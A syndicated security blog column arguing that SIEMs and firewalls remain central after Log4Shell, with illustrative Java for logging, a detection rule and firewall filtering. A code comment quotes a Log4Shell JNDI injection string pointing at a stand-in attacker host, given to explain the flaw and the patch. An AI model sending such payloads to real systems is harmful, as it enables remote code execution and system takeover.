
MY TAKE: Log4j’s big lesson – legacy tools, new tech are both needed to secure modern networks

Log4j is the latest, greatest vulnerability to demonstrate just how tenuous the security of modern networks has become.

Related: The exposures created by API proliferation

Log4j, aka Log4Shell, blasted a surgical light on the multiplying tiers of attack vectors arising from enterprises’ deepening reliance on open-source software.

This is all part of corporations plunging into the near future: migration to cloud-based IT infrastructure is in high gear, complexity is mushrooming and fear of falling behind is keeping the competitive heat on. In this heady environment, open-source networking components like Log4j spell opportunity for threat actors. It’s notable that open-source software vulnerabilities are just one of several paths ripe for malicious manipulation.

By no means has the cybersecurity community been blind to the complex security challenges spinning out of digital transformation. A methodical drive has been underway for at least the past decade to effect a transition to a new network security paradigm – one less rooted in the past and better suited for what’s coming next.

Log4j shines a light on a couple of solidifying developments. It reinforces the notion that a new portfolio of cloud-centric security frameworks must take hold, the sooner the better. What’s more, it will likely take a blend of legacy security technologies – in advanced iterations – combined with a new class of smart security tools to cut through the complexities of defending contemporary business networks.

I’ve recently had several deep-dive discussions about this with cybersecurity experts at Juniper Networks. The Sunnyvale, Calif.-based networking systems supplier, like any number of other established tech giants, as well as innumerable cybersecurity startups, is deeply invested in seeing this transition through to the end. Here are key takeaways:

Messy co-dependencies

It’s ironic that open-source software is steeped in altruism. In the early days of the Internet, coders created new programs for the sake of writing good code, then made it available for anyone to use and extend, license free. However, once the commercial Internet took hold, developers began leveraging open-source components far and wide in proprietary systems.

Open-source vulnerabilities in enterprise networks have since become a massive security blind spot. Log4j was preceded by JBoss, Poodle, Shellshock and Heartbleed. These were all obscure open-source components that, over time, became deeply embedded in enterprise systems across the breadth of the Internet, only to have a gaping vulnerability discovered in them late in the game.

Log4j, for instance, is a ubiquitous logging library. Its rather mundane function is to record events in a log for a system administrator to review and act upon later. Log4Shell now refers to the family of vulnerabilities — and related exploits — unearthed last December by a white hat researcher at Alibaba, the Chinese e-commerce giant. Left unpatched, Log4Shell vulnerabilities present easy paths for a threat actor to take full control of the underlying system.
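
To make that concrete, here is a minimal, illustrative sketch in Java of the kind of routine logging call Log4Shell turned into an attack path. The class name and strings are hypothetical, not drawn from any specific incident; the point is simply that untrusted input routinely ends up in log lines.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Illustrative only: an application dutifully logging an untrusted request field.
public class LoginAudit {

    private static final Logger logger = LogManager.getLogger(LoginAudit.class);

    static void recordFailedLogin(String userAgent) {
        // In vulnerable Log4j 2.x releases (2.0-beta9 through 2.14.1), message
        // lookups meant that attacker-controlled input resembling
        // "${jndi:ldap://attacker.example/a}" could trigger a remote JNDI lookup
        // and remote class loading, which is the Log4Shell path to full takeover.
        // Upgrading to a patched release (2.17.x or later) closes that path.
        logger.warn("Failed login attempt, user agent: {}", userAgent);
    }

    public static void main(String[] args) {
        // Stand-in for any attacker-controlled field (HTTP header, form value,
        // chat message) that ends up in a log line.
        recordFailedLogin("curl/7.68.0");
    }
}
```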

The bigger picture, says Mike Spanbauer, security evangelist at Juniper Networks, is that enterprises to this day continue to deploy open-source components without consistent rigor, often lacking a formal infusion of security quality-assurance coding practices. Gaping security holes regularly get discovered by hackers – both white hat and black hat – randomly probing for soft spots.

Expediency and cost savings drove commercial adoption of open-source components in the early days of the commercial Internet. And the very same mindset persists today, perhaps even more so, as companies increasingly rely on open-source software to keep pace, observes Kate Adam, Juniper Networks’ senior director of security product marketing.


“This is an established practice that’s now influencing in a new way due to how the business environment has shifted,” Adam says. The intensely competitive cybersecurity talent market is partly to blame here. Companies increasingly reach for off-the-shelf open-source components, Adam says, to some degree because of the scarcity of skilled coders, especially those steeped in security.

“Some enterprises never use anything open-source and always do everything themselves, but that’s a massive undertaking, and they’re in a tiny minority,” she says. Indeed, according to the Linux Foundation, as much as 80 percent of the code in current applications is open source, often buried deep.

Log4Shell illuminated the security snarls and tangles created by software co-dependencies that, in many organizations, have congealed into a chaotic, indecipherable mess. Here’s how Spanbauer describes what this looks like — from the perspective of an enterprise’s IT and security teams.

“How a given open-source library works in a specific app can be a mystery because arbitrary parties contributed pieces of coding that may or may not have been documented,” he says. “This makes for very flexible, very agile code, but there is also an absence of the data that you need for your security models — to determine how to best protect the assets you’re responsible for . . . This is the current state of affairs for practically every organization, almost without exception. And these types of co-dependencies are here to stay. They’re now the norm and security teams must assess and manage the risk of these stacks.”

Legacy tech’s role

Log4Shell actually contributes to progress in this sense: it heightens awareness, which should help accelerate the transition to a much-needed new security paradigm. Many more Gordian-knot issues need to be dealt with, to be sure. Complex and evolving cyber risks need to be resolved, for instance, when it comes to securing human and machine identities, tightening supply chains, mitigating third-party risks, protecting critical infrastructure and preserving individuals’ privacy.

Emerging frameworks, like Zero Trust Network Access (ZTNA), Cloud Workload Protection Platform (CWPP), Cloud Security Posture Management (CSPM) and Secure Access Service Edge (SASE), aim to help mitigate this spectrum of intensifying risks. Frameworks like these serve as guideposts. The task at hand is to steer the center of gravity for securing networks to the Internet edge, where cloud-centric resources and services increasingly reside.

This trend is well underway, and the handwriting is on the wall for many costly cybersecurity tools and services that were first installed 20 years ago to protect on-premises datacenters: obsolescence is on the near horizon. That said, a couple of prominent legacy technologies seem sure to endure as security cornerstones, moving forward. I’m referring to Security Information and Event Management (SIEM) systems and to firewalls.

SIEMs failed to live up to their hype in the decade after they were first introduced in 2005. Then about five years ago SIEMs got recast as the ideal mechanism for ingesting event log data arriving from Internet traffic, corporate hardware, mobile and IoT devices and cloud-hosted resources — the stuff of digital transformation.

This rejuvenation of SIEMs coincided with the emergence of advanced data analytics tools that could make more effective use of SIEM event logs; system orchestration became streamlined, human behavior got factored in and incident response became automated.
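
As a rough illustration of what one such automated detection looks like, here is a hypothetical sketch in Java of a single SIEM-style correlation rule: count failed-login events per source address and raise an alert past a threshold. The event format and the threshold are assumptions made for illustration, not any vendor’s implementation.

```java
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Hypothetical sketch of one SIEM-style correlation rule: flag any source IP
// that produces more than a threshold of failed-login events in a batch of logs.
public class FailedLoginRule {

    private static final int THRESHOLD = 5; // assumed alerting threshold

    // Each event here is just "sourceIp,outcome"; real SIEMs normalize far
    // richer records from firewalls, servers, cloud services and endpoints.
    static void evaluate(List<String> events) {
        Map<String, Integer> failuresBySource = new HashMap<>();
        for (String event : events) {
            String[] fields = event.split(",");
            if (fields.length == 2 && "FAILED_LOGIN".equals(fields[1])) {
                failuresBySource.merge(fields[0], 1, Integer::sum);
            }
        }
        failuresBySource.forEach((ip, count) -> {
            if (count > THRESHOLD) {
                // In a real deployment this would open a ticket or kick off an
                // automated response playbook rather than just printing.
                System.out.println("ALERT: possible brute force from " + ip
                        + " (" + count + " failed logins)");
            }
        });
    }

    public static void main(String[] args) {
        evaluate(List.of(
                "203.0.113.7,FAILED_LOGIN", "203.0.113.7,FAILED_LOGIN",
                "203.0.113.7,FAILED_LOGIN", "203.0.113.7,FAILED_LOGIN",
                "203.0.113.7,FAILED_LOGIN", "203.0.113.7,FAILED_LOGIN",
                "198.51.100.4,SUCCESS"));
    }
}
```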

As cloud-hosted processing power and data storage have gained more traction, the role of on-premises data centers has declined. Yet legacy protections for on-premises data centers continue to predominate. The unhappy result: cyber exposures — and successful network breaches – have continued to scale up.

Log4Shell is just the latest reminder that gaping security holes lie dormant everywhere, just waiting to be discovered and exploited, in both cloud and on-premises environments. Consider how ransomware has thrived in the transitional environment we’re now in, and how cyber espionage and cyber warfare have come to factor into geopolitical power struggles.

“Having the requisite technology to protect the data center and the edge actually is not enough, in and of itself,” Adam observes. “It’s now vital to be able to see the entire environment and respond to anomalies in near real time. SIEMs have become so popular because they pull everything together through logs.”

Visibility is vital

Where is this all taking us? New security frameworks, like ZTNA, CWPP, CSPM and SASE, are the blueprints for networks where the event logs ingested by SIEMs get put to higher uses: detecting and responding to legitimate threats. This will come to fruition on smarter platforms using automated tools, including advanced firewalls.

Firewalls predate SIEMs. Firewalls arrived on day one of companies connecting their networks to the Internet. While a SIEM ingests event data for analysis, a firewall filters traffic flowing in and out of a network.

The earliest firewalls filtered the tiny packets of data exchanged between applications, allowing only the packets that met certain criteria to pass through. This became the basis for blacklisting traffic originating from known bad IP addresses and for restricting employees from connecting to malicious webpages.
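
Here is a minimal sketch in Java of that first-generation logic, using placeholder addresses. Real packet filters operate on network-layer headers inside the firewall itself rather than in application code, but the allow-or-drop decision is the same idea.

```java
import java.util.Set;

// Sketch of first-generation firewall logic: allow or drop traffic purely on
// the basis of a static list of known-bad source addresses.
public class PacketFilter {

    // Placeholder addresses from the documentation range; a real blocklist
    // would be fed by threat intelligence and updated continuously.
    private static final Set<String> BLOCKED_SOURCES =
            Set.of("192.0.2.10", "192.0.2.66");

    static boolean allow(String sourceIp) {
        return !BLOCKED_SOURCES.contains(sourceIp);
    }

    public static void main(String[] args) {
        System.out.println(allow("192.0.2.10"));    // false: blocklisted source
        System.out.println(allow("198.51.100.23")); // true: passes the filter
    }
}
```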

Next Generation Firewalls (NGFW) came along in approximately the same time frame as the earliest SIEM systems. NGFWs could conduct deeper, much more detailed packet filtering and soon began taking on more advanced functionalities. NGFWs today can enforce security policies at the application, port and protocol levels – often detecting and blocking even the stealthiest malware before it slips into a network.
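
To show conceptually how that differs from simple address filtering, here is a hypothetical sketch in Java of an NGFW-style policy check: rules keyed to protocol, port and identified application, with a default-deny fallback. The rule set and application labels are made up for illustration.

```java
import java.util.List;

// Hypothetical sketch of an NGFW-style policy: rules match on protocol, port
// and identified application, not just on source address.
public class PolicyEngine {

    record Rule(String protocol, int port, String application, boolean allow) {}

    private static final List<Rule> RULES = List.of(
            new Rule("TCP", 443, "sanctioned-saas", true),  // approved cloud app
            new Rule("TCP", 443, "unknown-tunnel", false),  // evasive app hiding on 443
            new Rule("UDP", 53, "dns", true));

    static boolean permitted(String protocol, int port, String application) {
        for (Rule r : RULES) {
            if (r.protocol().equals(protocol) && r.port() == port
                    && r.application().equals(application)) {
                return r.allow();
            }
        }
        return false; // default-deny when no rule matches
    }

    public static void main(String[] args) {
        System.out.println(permitted("TCP", 443, "sanctioned-saas")); // true
        System.out.println(permitted("TCP", 443, "unknown-tunnel"));  // false
    }
}
```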

The evolution of firewalls, in fact, has never really slowed down and is continuing apace. Firewalls today come in an array of form factors; they’re available as an on-premises appliance, they can be set up to run virtually, or they can even be delivered as a subscription service.


“You can’t protect what you can’t see,” Spanbauer says. “Visibility is the key. Companies today, at a minimum, need a way to accurately detect potentially malicious events in a highly complex environment, one that’s only getting more complex. When it comes to visibility, a SIEM helps me see as much data as possible, and a firewall helps me to enforce policy and ensure the accuracy of my verdicts. It’s vital to eliminate any false positives, otherwise I’d just be adding to the chaos and creating more work for teams to investigate.”

SIEMs and firewalls clearly will remain at the core of bringing machine learning and leading-edge analytics to bear in the data-rich environment we’re in. “These legacy technologies are going to have a place for a very long time to come — helping companies to more effectively manage this transition and to limit the chaos as much as possible,” Adam says.

It’s logical for SIEMs and firewalls to play ever larger roles in automating detection and response tasks as part of helping enterprises cut through the complexity and calm the chaos — and materially raise the bar for network security.  I’ll keep watch and keep reporting.


Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

*** This is a Security Bloggers Network syndicated blog from The Last Watchdog authored by bacohido. Read the original post at: https://www.lastwatchdog.com/my-take-log4js-big-lesson-legacy-tools-new-tech-are-both-needed-to-secure-modern-networks/